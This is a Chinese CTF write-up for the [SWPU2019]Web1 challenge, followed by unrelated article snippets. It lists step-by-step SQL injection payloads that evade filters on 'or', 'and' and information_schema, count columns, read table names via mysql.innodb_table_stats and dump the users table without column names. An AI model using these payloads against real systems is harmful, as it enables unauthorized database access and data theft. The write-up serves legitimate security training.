SQL注入 --【过滤or（包含information、orderby这种也寄了）和and的类型】

时间：2023-09-27 16:58:11浏览次数：58

标签：orderby information group 21 22 19 -- union select

来自：

[SWPU2019]Web1

详见博客：

https://blog.csdn.net/plant1234/article/details/124205120

payload如下：

查看行数

1'/**/group/**/by/**/1,'1
......
直到
1'/**/group/**/by/**/23,'1报错
也就是说有22行

找出回显点

//找出回显点
-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

说明在2，3处。

获取库名

//查看当前数据库
-1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

获取表名

//用mysql.innodb_table_stats获取表名
-1'/**/union/**/select/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

发现有两张表，先看users表，但是没有字段名。

这里采取无字段名注入：（参考：https://www.jianshu.com/p/dc9af4ca2d06）

获取users有几个字段

//先获取users有几个字段
-1'/**/union/**/select/**/1,(select/**/group_concat(1)/**/from/**/users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

字段值为3。

获取表字段值

第一个字段值：

-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1/**/as/**/b,2,3/**/union/**/select/**/*/**/from/**/users)hack),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

获取第二个字段：

-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/b,3/**/union/**/select/**/*/**/from/**/users)hack),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

查看第三个字段：

-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)hack),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

标签：orderby,information,group,21,22,19,--,union,select
From： https://www.cnblogs.com/EddieMurphy-blogs/p/17733090.html

【node】发送邮件及附件简要使用说明
Nodemailer是一个用于Node.js应用程序的模块，可以轻松发送电子邮件。该项目始于2010年，当时没有合理的选项来发送电子邮件消息，如今它是大多数Node.js用户默认选择的解决方案。一、环境配置安装模块：nodemailernpminodemailer--save二、邮箱服务配置如下：lettransporter=no......
ORA-01008：并非所有变量都已绑定-解决办法
近期批量处理数据，后台用JAVA编写，连接Oracle数据库，程序运行报ORA-01008问题。解决这个问题时遇见的坑较多，下面复盘现象、问题提出解决办法，希望能帮到遇见同类问题的你。调试问题：后台代码：/***插入操作的封装***/publicstaticvoidinsertRo......
vue，用户可操作权限判断，数据创建人判断
需求：需要判断登录用户是否有对应的操作权限，有则显示对应的操作入口。判断某物的创建人是否为当前用户，是则可进行删除或修改操作。调用以下函数。userId为当前登录的用户id； ......
Chrome浏览器下载文件被自动拦截怎么办
谷歌浏览器下载文件被自动拦截怎么办？在使用谷歌浏览器进行网络文件下载的时候，下载的文件进程被浏览器给阻止了，导致无法获取文件下载资源了。如何解除这个拦截功能呢？来看看解决方法分享吧！操作教学1、首先打开谷歌浏览器，在谷歌浏览器右上角可以看到一个由三个点组成的图标，点击该图......
案例7：将"picK"译成密码
密码规则:用当前字母后面的第五各字符来代替当前字符。比如字符'a'后面的第5个字符为'f'，则使用'f'代替'a'。编写程序，实现该功能。示例代码如下:#define_CRT_SECURE_NO_WARNINGS1#include<stdio.h>voidmain(){ charc1='p',c2='i',c3='c'......
Springboot+Echarts（五）
Mybatis-plus操作的多表查询和分页查询今天首先回顾了之前所学的基本的单表增删改查这里想再自己写一遍是为了方便自己以后的开发流程顺利首先创建Springboot项目，选择java8和Springboot2.x.x之后选择Web依赖然后添加依赖<dependency><groupId>com.baomidou<......
运行在容器中Postgres数据库数据损坏后如何恢复?
前言在使用K8S部署RSS全套自托管解决方案-RssHub+TinyTinyRss,我介绍了将RssHub+TinyTinyRSS部署到K8s集群中的方案.其中TTRSS会用到Postgres存储数据,也一并部署到K8s容器中.但是最近,由于一次错误操作,导致Postgres数据库的WAL损坏,Postgres......
5. 串口接收数据——基于FPGA的串口发送数据实验
1.串口接收原理与思路1.1基本原理采样：每位数据采多次，统计高低电平出现的次数，次数多的就是该位的电平值起始位检测：边沿检测，使用两个计数器来判断Bps_Clk的下降沿/上升沿（前一个时钟上升沿为高电平/低电平，后一个时钟上升沿为低电平/高电平），两个触发器即可设计得到。新语法：reg......
算法训练day22 LeetCode235
算法训练day22LeetCode235.701.450.235.二叉搜索树的最近公共祖先题目235.二叉搜索树的最近公共祖先-力扣（LeetCode）题解代码随想录(programmercarl.com)对于二叉树，可以用递归回溯的方式对于二叉搜索树，由其根节点大于左右子树中结点，所以当第一次遍历到根节点值......
Anolis8制作OpenSSH9.4p1 RPM包
Anolis8制作OpenSSH9.4p1RPM包......